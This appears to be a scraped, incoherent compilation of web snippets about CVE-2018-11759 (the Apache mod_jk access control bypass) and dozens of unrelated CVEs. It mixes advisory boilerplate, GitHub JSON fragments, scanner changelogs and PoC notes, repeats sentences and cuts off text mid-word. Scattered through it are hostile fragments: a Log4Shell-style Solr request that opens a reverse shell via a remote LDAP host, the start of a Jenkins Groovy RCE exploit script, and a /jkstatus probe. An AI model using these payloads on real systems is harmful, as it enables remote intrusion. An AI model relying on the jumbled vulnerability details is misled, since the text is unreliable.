Report As Exploited in the Wild. Timeline. 1. 06/09/2018 : First contact with Apache Tomcat security team; 06/09/2018 : First response from Apache Tomcat security team; 13/10/2018 : mod_jk v1. 输入文件批量扫描. 2. This vulnerability occurs due to a dangling pointer in the Primetime SDK related to media player handling of listener objects. Network Error: ServerParseError: Sorry, something went wrong. cve-2018-7602_poc. Published: 31 October 2018. A malicious user (or attacker) can craft a message to the broker that can lead to a. Important: Information disclosure CVE-2018-11759. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. gitignore","path. NVD Analysts use publicly available information to associate vector strings and CVSS scores. 310739), Update 6 and earlier, and Update 14 and earlier have a deserialization of untrusted data vulnerability. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in While there is some overlap between this issue and CVE-2018-1323, they are not identical. 7 before 6. yml","path":"pocs/74cms-sqli-1. 6. . In a nutshell, the vulnerability involves the injection of a payload as unvalidated input into a Struts application which is then evaluated and used to cause a remote code execution. CVE-2017-12615. 6 (in 4. 0 remote code execution vulnerability in the Big-IP administrative interface. 0. CVE-2018-17179 NVD Published Date: 05/17/2019 NVD Last Modified: 05/20/2019 Source: MITRE. 0 to 1. 44 did not handle some edge cases correctly. 0到1. 5. 2. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. 44 that broke request handling for OPTIONS * requests. CVE-2020-1102. First 100 lines of output provided for each file type. 2. CVE-2018-11759 at MITRE. yml","contentType":"file"},{"name":"74cms. Implement Identificador-CVE-2018-11759 with how-to, Q&A, fixes, code snippets. 1. CVSS 3. This vulnerability is known as CVE-2017-15715 since 10/21/2017. It is awaiting reanalysis which may result in further changes to the information provided. This is an record on the , which provides common identifiers for publicly known cybersecurity vulnerabilities. Description. 2. yml","contentType":"file"},{"name":"74cms. An issue was discovered in OpenEXR before 2. My Templates . yml","path":"pocs/74cms-sqli-1. Transition to the all-new CVE website at WWW. Wordpress. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map did not handle some edge cases correctly. 3. pg_logfile_rotate () function doesn't follow the same ACLs than pg_rorate_logfile. CVE-2018-18559 NVD Published Date: 10/22/2018 NVD Last Modified: 05/16/2023 Source: MITRE. 30102 and earlier, and 2015. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. e. 4, 9. Instant dev environments. 2, a special BeanIntrospector class was added which allows suppressing the ability for an attacker to access the classloader via the class property. First 100 lines of output provided for each file type. 11, 8. This vulnerability has been modified since it was last analyzed by the NVD. CVE-2018-10759 NVD Published Date: 05/16/2018 NVD Last Modified: 05/06/2020 Source: MITRE. 需为txt文本格式,确保每一行只有一个域名. Our aim is to serve the most comprehensive collection of exploits gathered through direct submissions, mailing lists, as well as other public sources, and present them. CVE-2020-11759 2020-04-14T23:15:00 Description. g. While there is some overlap between this issue and CVE-2018-1323, they are not identical. S. Supported versions that are affected are 12. Apache Tomcat mod_jk JK Status Manager Access Bypass - Ixia provides application performance and security resilience solutions to validate, secure, and optimize businesses’ physical and virtual networks. 2. 2. 2-STABLE(r340854) and 11. 2. 44 access. If the adminpack is added to a database, an attacker able to connect to it could exploit this to force log rotation. 0. 3. Vulnerability Name Date Added Due Date Required Action; Oracle WebLogic Server Remote Code Execution Vulnerability: 11/03/2021: 05/03/2022. 0. Contribute to 0nk4r/templates development by creating an account on GitHub. CVE-2018-11759. 44 did not handle some edge cases correctly. Executive Summary. 16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. . myscan. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. Apache ShenYu dashboardUser 账号密码泄漏漏洞. A vulnerability in the implementation of Internet Key Exchange Version 1 (IKEv1) functionality in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. Go to for: CVSS Scores CPE Info. Apache implemented “regex” pattern [[a-zA-Z0-9Q-_. CVE-2017-11610. A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory, aka "Internet Explorer Memory Corruption Vulnerability. 4. HIGH. 4. NOTICE: Legacy CVE. 2. CVE-2018-7490 Detail Description . Go to for: CVSS Scores. (Website). Overall state of this security issue: Resolved0xtavian/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins; 1NTheKut/CVE-2019-1003000_RCE-DETECTION; CVE-2019-10086. tar后缀的压缩包调用了新增的unTarUsingJava函数来进行处理,我们下载存在漏洞的版本看一下漏洞位置In Mitre's CVE dictionary: CVE-2018-11759. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. md","path":"README. (rjung) * Security: CVE-2018-11759 Connector path traversal [bsc#1114612] Update to version 1. #! /usr/bin/env python2 #Jenkins Groovy XML RCE (CVE-2016-0792) #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins #Made with <3 by @byt3bl33d3r from __future__ import print_function import requests from requests. CVE-2019-11759 Common Vulnerabilities and Exposures. 1. Important: Information disclosure CVE-2018-11759. Saved searches Use saved searches to filter your results more quickly(rjung) * Security: CVE-2018-11759 Connector path traversal [bsc#1114612] Update to version 1. e-books, white papers, videos & briefsDate: Wed, 31 Oct 2018 18:21:48 +0000 From: Mark Thomas <[email protected] to 1. Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. An attacker could have caused 4 bytes of HMAC output to be written past the end of a buffer stored on the stack. yml","contentType":"file"},{"name":"74cms. 2. CVE-2018-11759. Spring Framework, versions 5. Después de ejecutarse, el navegador visita // <su IP> y aparece la siguiente interfaz, que indica que el entorno se configuró correctamente. Wordpress. 1 data. The vulnerability, assigned CVE-2018-11776 and first discovered in April of this year is actually a group of vulnerabilities of the same type. 011. 5% High. Track Updates Track Exploits. x REST RCE. POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 运行后,可通过以下地址访问易受攻击的代理 开发 可以将使用mod. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. 06/09/2018 : First contact with Apache Tomcat security team; 06/09/2018 : First response from Apache Tomcat security team; 13/10/2018 : mod_jk v1. 45 Fixes: * Correct regression in 1. 20063 and earlier, 2017. The proof of concept below shows how to exploit the CVE-2018-11759 as well as its impact on the information system. CVE-2018-18444: makeMultiView. Modified. 3. Strong Copyleft License, Build not available. 3. x Severity and Metrics: NIST:. {"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"files_cap","path":"files_cap","contentType":"directory"},{"name":". CVE Dictionary Entry: CVE-2018-1159 NVD Published Date: 08/23/2018 NVD Last Modified: 10/12/2018 Source: Tenable Network Security, Inc. Support. (rjung) * Improve path parameter parsing so that the session ID specified by the session_path worker property for load-balanced workers can be. CVE-2018-11759 - Apache Tomcat Connector Module(mod_jk) access control bypass. Apache OF Biz RMI Bypass RCE CVE 2021 29200. x prior to 2. > CVE-2019-0221. (CVE-2018-11759) Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number. 4-3. CVE-2018-25032 Detail Modified. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. CVE-2018-1275 : Spring Framework, versions 5. x prior to 5. You can find POCs for CVEs related to Microsoft Exchange, Jira, SMB, SolarWinds and more. Modified. The archive main are a script in bash for exploiting. 尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。 CVE-2018-11759 : docker pull vulfocus/apache-CVE-2018-11759 : CVE-2018-11759 : Vulfocus : CVE-2020-13925 : docker pull vulfocus/kylin-cve_2020_13925 : uWSGI PHP目录穿越漏洞(CVE-2018-7490) 文件上传: poc-10127: PowerCreator CMS 文件上传getshell: 命令执行: poc-10126: Dlink 路由器 远程命令执行 (CVE-2019-16920) 目录穿越: poc-10125: Tomcat mod_jk访问控制绕过漏洞(CVE-2018-11759) 命令执行: poc-10124: Nexus Repository Manager 3. 1. An issue was discovered in OpenEXR before 2. # Security update for apache2-mod_jk Announcement ID: SUSE-SU-2023:4513-1 Rating: important References: * bsc#1114612 Cross-References: * CVE-2018-11759 CVSS scores: * CVE-2018-11759 ( SUSE ): 7. CVE-2019-11759. 4反序列化漏洞 CVE-2016-4437; Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483; Apache Solr JMX服务 RCE CVE-2019-12409{"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"image","path":"image","contentType":"directory"},{"name":"README. 0. This CVE is in CISA's Known Exploited Vulnerabilities Catalog Reference CISA's BOD 22-01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements. Check if your instances are expose the CVE 2018-11759. Important: Information disclosure CVE-2018-11759. Download and decompress the latest EPSS scores from the Cyentia Institute and save them in CSV, JSON, and JSONL format. Host and manage packages Security. NOTICE: Legacy CVE. NOTICE: Transition to the all-new CVE website at WWW. 44 did not handle some edge cases correctly. may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected. 44 that broke request handling for OPTIONS * requests. SUSE information. 0. The urls shall use the protocol and complete addres, example: . POC . 7 and 6. 1. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. An issue was discovered in OpenEXR before 2. We also display any CVSS information provided within the CVE List from the CNA. Apache Mod_jk 访问控制权限绕过 CVE-2018-11759. Modified. References; Note: References are provided for the convenience of the reader to help distinguish between vulnerabilities. Weakness. 4. - Nuclei-TamplatesBackup/CVE-2018-11759. A remote, authenticated attacker could use one of these flaws to execute arbitrary code, create arbitrary files, or cause denial of service on. (rjung) * Improve path parameter parsing so that the session ID specified by the session_path worker property for load-balanced workers can be. • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information. 尽管此问题与CVE-2018-1323之间存在某些重叠之处,但它们并不完全相同。 POC 以下概念验证显示了如何利用CVE-2018-11759及其对目标信息系统的影响。 环境设定 docker-compose up -d 请耐心等待,第一次的过程可能会很长。We also display any CVSS information provided within the CVE List from the CNA. Description This update for apache2-mod_jk fixes the following issues : Security issues fixed : CVE-2018-11759: Fixed connector path traversal due to mishandled HTTP requests in (bsc#1114612). Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. CVSS 3. POST /PW/SaveDraw?path=. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. 2. 29 has Invalid Parameter Checking that leads to code injection as root. NOTICE: Legacy CVE List download formats will be phased out beginning January 1, 2024. 5. It is awaiting reanalysis which may result in further changes to the information provided. x CVSS Version 2. New test for Apache Solr XXE (CVE-2017-12629)New test for RCE in Spring Security OAuth (CVE-2016-4977)New test for Apache mod_jk access control bypass (CVE-2018-11759)New test for Unauthenticated Stored XSS in WordPress Plugin WPML (CVE-2018-18069)New test for ACME mini_(web. CVE-2020-14644 Detail Description . 5. 2. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache. 0. md","path":"Web. Manage code changes Issues. Affected Systems. Go to for: CVSS Scores. TOTAL CVE Records: 217649. x prior to 2. If only a sub-set of the URLs supported by Tomcat were exposed via then it was possible for a specially. CVE-2018-11759 at MITRE. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. uWSGI before 2. resources library. Learn everything you need about CVE-2018-11759: type, severity, remediation & recommended fix, affected languages. Published: 31 October 2018. CVE-2018-11759 Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE. This CVE is in CISA's Known Exploited Vulnerabilities Catalog Reference CISA's BOD 22-01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements. 3 prior to 4. 2, and Firefox ESR < 68. 12 allows memory corruption when deflating (i. 2. 0 to 1. {"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"files_cap","path":"files_cap","contentType":"directory"},{"name":". 2, and Firefox ESR < 68. An issue was discovered in OpenEXR before 2. Find and fix vulnerabilities Codespaces. authenticate. 9. We also display any CVSS information provided within the CVE List from the CNA. This could be used by an attacker to execute arbitrary code or more likely lead to a crash. yml","path":"pocs/74cms-sqli-1. Description The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1. ORG and CVE Record Format JSON are underway. Proposed (Legacy) N/A. This vulnerability affects Firefox < 70, Thunderbird < 68. CVE - CVE-2018-11777. While there is some overlap between this issue and CVE-2018-1323, they are not identical. CVE-2018-11759. 0. myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。CVE-2018-11759. This could be used by an attacker to execute arbitrary code or more likely lead to a crash. Note: NVD Analysts have published a CVSS score for this CVE based on publicly available information at the time of analysis. Automate any workflow Packages. Download and decompress the latest EPSS scores from the Cyentia Institute and save them in CSV, JSON, and JSONL format. 0 to 1. An issue was discovered in OpenEXR before 2. ORG CVE Record Format JSON Legacy CVE List download formats will be phased out beginning January 1, 2024 New CVE List download format is. The bug was discovered 03/21/2018. 7. may reflect when the CVE ID was allocated. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice. As an impact it is known to affect confidentiality, integrity, and availability. cpp in exrmultiview in OpenEXR 2. CVE-2020-15158 Detail Description . It can also be taken from an arbitrary environment variable by. yml","path":"pocs/74cms-sqli-1. replies . e-books, white papers, videos & briefsWe also display any CVSS information provided within the CVE List from the CNA. Red Hat Insights Increase visibility into IT operations to detect and resolve technical issues before they impact your business. 2. 44 that broke request handling for OPTIONS * requests. TOTAL CVE Records: Transition to the all-new CVE website at Legacy CVE List download formats will be phased out beginning January 1, 2024 New CVE List download format is. . Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer. Home > CVE > CVE-2018-16759 CVE-ID; CVE-2018-16759: Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP. 2. Description. CVE Dictionary Entry: CVE-2018-11771 NVD Published Date: 08/16/2018 NVD Last Modified: 11/06/2023 Source: Apache Software. CVE-2018-11779 at MITRE. 2. Vulnerability Name Date Added Due Date Required Action; Webmin Command Injection Vulnerability: 03/25/2022: 04/15/2022. More information: Raphael Arrouas and Jean Lejeune discovered an access control bypass vulnerability in mod_jk, the Apache connector for the Tomcat Java servlet engine. python3 cerberus. 0. We also display any CVSS information provided within the CVE List from the CNA. Summary. A tag already exists with the provided branch name. Are directives included in a JkMountFile directive vulnerable as well?. Rule Vulnerability. Latest CVE News Follow CVE Free CVE Newsletter CVEnew Twitter Feed CVEannounce Twitter Feed CVE on LinkedIn CVEProject on GitHub. cpp in exrmultiview in OpenEXR 2. 0至8. CVE-2018-11759. 46 fix is released; 31/10/2018 : CVE-2018-11759 advisory is issued; 01/11/2018. More information: Raphael Arrouas and Jean Lejeune discovered an access control bypass vulnerability in mod_jk, the Apache connector for the Tomcat Java servlet engine. Note: NVD Analysts have published a CVSS score for this CVE based. If only a sub-set of the URLs supported by Tomcat were exposed via. 4. CPEs for CVE-2018-11759 . 0 to 1. 4. x prior to 2. CVE-2019-11759. The Exploit Database is a CVE compliant archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. br","path":"files_cap/example. The CVSS Calculator can be used Freely via our vDNA API. The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json vulhub/jboss/CVE-2017-7504 docker-compose build docker-compose up -d Thinkphp CVE-2018-5955. The CNA has not provided a score within the CVE. 2, a remote attacker can read unintended static files via various representations of absolute or relative pathnames, as demonstrated by file: URLs and directory traversal sequences. We also display any CVSS information provided within the CVE List from the CNA. Home > CVE > CVE-2018-11259 CVE-ID; CVE-2018-11259: Learn more at National Vulnerability Database (NVD) • CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP. Due to Improper Access Control of NAND-based EFS in Snapdragon Automobile, Snapdragon Mobile and Snapdragon Wear, From fastboot on a NAND-based device, the EFS partition can be erased. Github POC. This page shows the components of the CVSS score for example and allows you to refine the CVSS base score. CVE-2020-11759 2020-04-28T17:39:52 Description. 7 U3l and 6. resources library. 55 directories, 526 files. 0. Description This update for apache2-mod_jk fixes the following issue : Security issue fixed : CVE-2018-11759: Fixed connector path traversal due to mishandled HTTP requests in (bsc#1114612). Partners. August 24, 2018. 2. 18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. CVE-2018-11759. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on. CVE-2020-11759: An issue was discovered in OpenEXR before 2. The Apache Web Server (specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk). 2. CVE-2018-11529 Detail Description . 54 : Apache License 2. 2. {"payload":{"allShortcutsEnabled":false,"fileTree":{"":{"items":[{"name":"Nuclei-Templates","path":"Nuclei-Templates","contentType":"directory"},{"name":"foulenzer. Solutions. Github POC. ORG and CVE Record Format JSON are underway. The archive main are a script in bash for exploiting. 0 to 7. We also display any CVSS information provided within the CVE List from the CNA. 0' vul_name: Apache Mod_jk 访问控制权限绕过漏洞 vul_type: 访问控制权限绕过 vul_type_english: permission-bypass verify: - request: data: None header: None method: GET path: /jkstatus response:CVE-ID; CVE-2018-12759: Learn more at National Vulnerability Database (NVD). The weakness was shared 03/26/2018 (oss-sec). 2. New test for Apache mod_jk access control bypass (CVE-2018-11759) New test for Unauthenticated Stored XSS in WordPress Plugin WPML (CVE-2018-18069) New test for ACME mini_(web server) arbitrary file read (CVE-2018-18778) New test for OSGi Management Console Default Credentials; New test for Flex BlazeDS AMF Deserialization RCE (CVE-2017-5641) {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. 0. Automate any workflow Packages. {"payload":{"allShortcutsEnabled":false,"fileTree":{"pocs":{"items":[{"name":"74cms-sqli-1. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. br","contentType":"file. CVE-2018-11219 NVD Published Date: 06/17/2018 NVD Last Modified: 08/04/2021 Source: MITRE. 2. CVE-2018-11039 Detail Description . For more urls in one consult, can be. CVE-2020-11759 2020-04-14T23:15:00 Description. 0至7. Thinkphp CVE-2018-5955. x is prone to a use after free vulnerability which an attacker can leverage to execute arbitrary code via crafted MKV files. 3. 1. I gathered these nuclei templates from several github repositories. packages. Github POC. 6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. Synopsis The remote SUSE host is missing one or more security updates. Github POC. Verificación de vulnerabilidad 0x04. /. Cloud Security; Cybersecurity Articles; Cybersecurity Attacks; Data Breach; Identity & Access Management; Internet of Things (IoT) Malware; Mobile SecurityThe mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 2. Question: Explain what happened in this cases in details and how it can be fixed Important: Information disclosure CVE-2018-11759 The Apache Web Server (specific code. This. Hi, Really good read based on your blog post (Now, I am wondering if some kind of. CVE-2018-16759 NVD Published Date: 09/09/2018 NVD Last Modified: 11/07/2018 Source: MITRE. A Docker environment is available to test this vulnerability on our GitHub. 2. 394 do not exit on failed Initialization. 0 Oracle WebLogic Server 12. Contribute to inbug-team/SweetBabyScan development by creating an account on GitHub. Successful exploitation could lead to arbitrary code execution. In Apache Commons Beanutils 1. A Docker environment is available to test this vulnerability on our GitHub. 4. CVE Additional Information This product uses data from the NVD API but is not endorsed or certified by the NVD. 1. CVSS v3. CVE-2020-5410 Detail Description Spring Cloud Config, versions 2. php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. NVD Analysts use publicly available information to associate vector strings and CVSS scores.